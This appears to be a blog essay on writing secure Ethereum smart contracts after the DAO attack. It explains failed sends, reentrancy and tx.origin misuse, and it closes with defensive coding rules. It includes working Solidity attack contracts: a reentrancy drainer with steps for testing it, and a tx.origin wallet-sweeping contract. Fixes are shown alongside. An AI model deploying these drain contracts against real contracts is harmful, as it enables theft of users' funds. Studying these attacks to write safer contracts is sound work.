In the wake of the DAO attack, various people are claiming that it's near impossible to write secure smart contracts on Ethereum. People are advocating wholesale overhauls of the language, VM, execution model, everything. They're saying regular developers can't handle security issues like this and Ethereum is doomed. These claims are overblown.
It's not like everyday developers aren't used to dealing with security issues. Web developers have to follow best practices to avoid SQL injection, cross-site scripting, cross-site request forgery, all sorts of problems. C programmers have their own challenges. In some circumstances, screwing this stuff up has enormously bad consequences. Ethereum is no worse, and in some ways better; at least most of our programs are only a few pages long.
The fact is, if you look at the attacks that have actually happened, they don't look all that hard to avoid by following some pretty simple coding practices. Those practices are no harder than what other programmers have to deal with, and in some ways they're easier. But just like buffer overflows and CSRF and all the rest, they're not obvious.
When I started writing smart contracts, I didn't investigate security issues right away. My contracts looked fine to me. When I started thinking about publishing the code, and maybe even deploying something, I started reading up on contract security. It turned out all my contracts were full of security holes. But it also turned out they were easy to fix.
Early Days
The first thing I read was the King of the Ether Throne post-mortem. This contract was thrown by a single line:
currentMonarch.etherAddress.send(compensation);
That sends money to currentMonarch when a new monarch takes over. Unfortunately, they didn't realize that send() can silently fail. Ethereum has exceptions that roll back changes, and with normal function calls they bubble up, but with ether sends they don't. The reason they don't is that if you were were sending ether to a bunch of people in a loop, you won't want one failed send to block the ether transfers to everybody.
One reason send() can fail is that in Ethereum, an address can be either a simple account or a contract, and contracts can run code when they receive ether. Send() only forwards 2300 gas, which isn't enough to do more than write to the log. Several monarchs were wallet contracts that required more gas than that. The sends failed and they lost access to their ether.
Send returns a success boolean, so one thing you can do is check it:
if (!currentMonarch.etherAddress.send(compensation)) throw;
That at least prevents the failure from going unnoticed, but it still leaves the question of how you're going to send ether to currentMonarch. Luckily there is a way: use address.call.value()(), which does forward all available gas. The post-mortem recommends doing exactly that.
But what if currentMonarch is constructed to consume all gas? All it needs is an endless loop. Once again, a malicious contract can stop everybody from getting their money.
There's an easy way to avoid all this: never send money to people, and instead let them initiate their own transactions to withdraw their own money. That way they pay their own gas costs for whatever their own contract does.
Ether transfers can fail for another reason: Ethereum's call stack maxes out at 1024. By taking advantage of this you can force a contract's sends to fail, along with any other external calls. Another cause of failure is reaching the block gas limit because you're attempting a giant loop. As far as ether transfers are concerned, the same pattern prevents both issues: When you send ether, either send it to msg.sender, or to some address designated by the sender. And always, in any external call, check for failure.
And that was where things stood for a while, until...
TheDAO
A couple weeks ago, Peter Vessenes wrote about the recursive call attack. If contract A calls contract B (even with just an ether send using call.value), and contract B calls beck contract A, then you can get into a recursive loop. If A, for example, decrements B's balance after the call instead of before, then when B calls back, A starts from the beginning, and sends more ether to B without having reduced B's balance yet. B can do this recursively until A is out of money (or the transaction is out of gas).
It's a problem for any call to another contract, but often comes up if you send ether to other addresses using address.call.value(). If you use address,send(), you're protected because it doesn't forward enough gas to allow shenanigans. The very same fix we used above turns out to open us to an even worse attack.
Here's some code to try it out:
contract Victim {
mapping (address => uint) userbalances;
function withdraw() {
if (msg.sender.call.value(userbalances[msg.sender])()) {
userbalances[msg.sender] = 0;
}
}
function() {
userbalances[msg.sender] += msg.value;
}
}
contract Attacker {
Victim v;
function Attacker(address dest) {
v = Victim(dest);
}
function attack() {
v.call.value(msg.value)();
v.withdraw();
}
function() {
if (msg.gas > 100000) {
v.withdraw();
}
}
}
(Note: attack() throws a warning on the latest Solidity compiler: "Return value of low-level calls not used". Yay!)
To test this, take a Victim contract with, say, 100 wei, then an Attacker contract pointed to Victim, then call attacker.attack() with, say, 20 wei. Attacker ends up with all the victim's money.
To fix it you can use send() instead of call.value(), but as we've seen, send() causes other problems. Is there a way out? Yes! The problem happens when you make a necessary state change after doing call.value, instead of before. Our victim contract is safe if we write it like this:
function withdraw() {
uint x = userbalances[msg.sender];
userbalances[msg.sender] = 0;
if (!msg.sender.call.value(x)()) throw;
}
Reduce the balance before sending the ether, and when the attacker calls back, the balance is already reduced. Run the same test on this code, and you'll see that no funds are stolen.
More generally: always put an external call at the very end of your function. The function will start at the beginning and run to the end, just like you designed it to run. Then maybe the recipient of your call runs some code. Maybe the recipient calls your contract back, but once again, the function it calls will start at the beginning and run to the end, just like you designed. It's no different than if that second call were in an entirely separate transaction.
And the recipient can only call your public functions. That's the stuff you intended for people to call in the first place, so it's fine. Well...almost fine....
Don't use tx.origin
Let's say you follow all the above advice, and make a wallet contract like this:
contract TxUserWallet {
address owner;
function TxUserWallet() {
owner = msg.sender;
}
function transfer(address dest, uint amount) {
if (tx.origin != owner) { throw; }
if (!dest.call.value(amount)()) throw;
}
}
Now someone makes this nasty little contract, and convinces you to send a little ether to its address from your wallet.
contract TxAttackWallet {
address owner;
function TxAttackWallet() {
owner = msg.sender;
}
function() {
TxUserWallet(msg.sender).transfer(owner, msg.sender.balance);
}
}
The attack wallet calls your wallet's transfer function. It's still part of the same transaction, so tx.origin is you, not the attacker. Your wallet happily sends all your ether to the attacker.
Don't use tx.origin for authorization. Use msg.sender instead; that will be the address of the attacker's contract, and authorization will fail. You probably shouldn't use tx.origin in general, since it prevents people from using their wallet contracts to interact with your contract. Besides, tx.origin is likely to be removed from Solidity.
Note that if you're using the "withdraw don't send" pattern, where you never send ether to anyone besides msg.sender, then you're protected from this attack anyway. But that's not an option for wallet contracts.
Belt and Suspenders
That tx.origin attack is a little scary. I was thinking functions were provably safe from callback attacks if they had just one external call at the very end, and it turns out there's still a potential problem because we have this built-in variable, which is different when an untrusted address is calling you back than when it's calling you in a fresh transaction. Looking over the other built-ins I don't see anything else like this. Gas and stack depth will be different in a callback, but those can be manipulated anyway. So if we exclude tx.origin and restrict our external calls, then maybe we really can be provably safe from callback attacks.
But if you want to just shut off callbacks entirely, there's a way people often recommend. It doesn't quite work right now, but will soon; just do this:
bool mutex;
modifier critical {
if (mutex) throw;
mutex = true;
_
mutex = false;
}
Then put that modifier on every public function. You don't need a separate mutex for every user, since the EVM runs a single transaction at a time. You don't want a separate mutex for every user, since a callback will have a different msg.sender, so a per-user mutex would actually allow a single callback. And you don't want a different mutex for each function, since an attack might not call back the same function. Just one mutex that protects your whole contract at once is all you need.
The reason it doesn't quite work is that if a function has an explicit return, the modifier won't run the code after the underscore! I.e. using the above mutex, this code leaves the mutex false:
function test() critical { }
But this code leaves the mutex true, hence breaking the entire contract:
function test() critical { return; }
This is a posted issue on github, so a mutex will probably be a reliable option later. It'll still cost a little gas; 20,000 gas to set the mutex true, minus the 15,000 gas refund when you set it back to false, for every transaction on your contract. But maybe it's worth it.
So taking all of this into account, here are...
The Rules
(1) Each public function can only make one external call, and it's the very last step.
(2) Don't use tx.origin.
To make sure you don't accidentally make other external calls, also do this:
(3) Only make external calls from public functions.
(4) No function can call a public function.
Specifically for transferring ether:
(5) Use .value() instead of send(). A lot of people are recommending the opposite right now, either because they're not using the rules above, or just as an excess of caution against major failure like TheDAO. But if you use .value() the user can include however much gas is required, instead of losing ether like the ill-fated Kings of the Ether Throne.
(6) Avoid sending ether in a function that does other important work. If you can, provide a withdraw() function and only send ether to msg.sender. In a few cases, like wallet contracts, that won't be an option and you'll need a function like transferTo(address recipient, uint amount). But try to always use functions where the transfer is the main point, and any other work is a side effect of the ether transfer (e.g. updating the user's balance in the contract's internal ledger).
(7) Always check whether the transfer was successful, and if not, throw. Rule 7 depends on the previous rules. Throwing would be wrong if you were sending to a bunch of addresses in a loop, but that would violate rule 1. It's also wrong if the function sending ether does other work that shouldn't be blocked from happening, but that violates rule 6.
I think that covers all the issues I've seen around calls and ether transfers, but for true paranoia, or if you really can't follow all the above rules:
(8) Use a mutex to prevent callbacks (but for now, only if you're not doing an explicit return anywhere).
By the way, if you're auditing code and wont to look for everything that transfers ether, you have to look for ".value(". Don't do what I did when, just for grins, I did a quick search of TheDAO. I looked for "call.value" and completely missed the ether transfer smack in the middle of splitDAO(). Any external method call can have a ".value()" attached to add ether. (Even if I did see that transfer, the attack wasn't obvious, since a child DAO has no attack code. The attack depended a call from splitDAO to withdrawRewardFor, which transferred reward money; the recipient of that called back to splitDAO. Hence rules 3 and 4.)
A drawback to this whole approach is that you might have to redesign the public interface to your contract. But so far, that doesn't seem onerous to me, for a wide variety of applications. I hope to illustrate that in future posts.
This doesn't fix everything, of course. Contracts could just have plain old bugs unique to them. And there's a whole different class of attacks around manipulating the underlying infrastructure. Miners can (to some degree) manipulate timestamps and block hashes, which gambling contracts sometimes use for random numbers. Anyone can monitor transactions that aren't in blocks yet, and try to cheat in various ways by getting their own transactions in first. There's a tool coming out soon to look for these sorts of vulnerabilities.
Also, Ethereum's developers are working on various improvements to the EVM and Solidity, to get rid of some of the pitfalls. There's a proposal that should fix that stack overflow attack, for example.
For now though, the above rules should do a pretty good job of defending your contracts from the current known set of attack techniques which can be executed by using nothing but Solidity.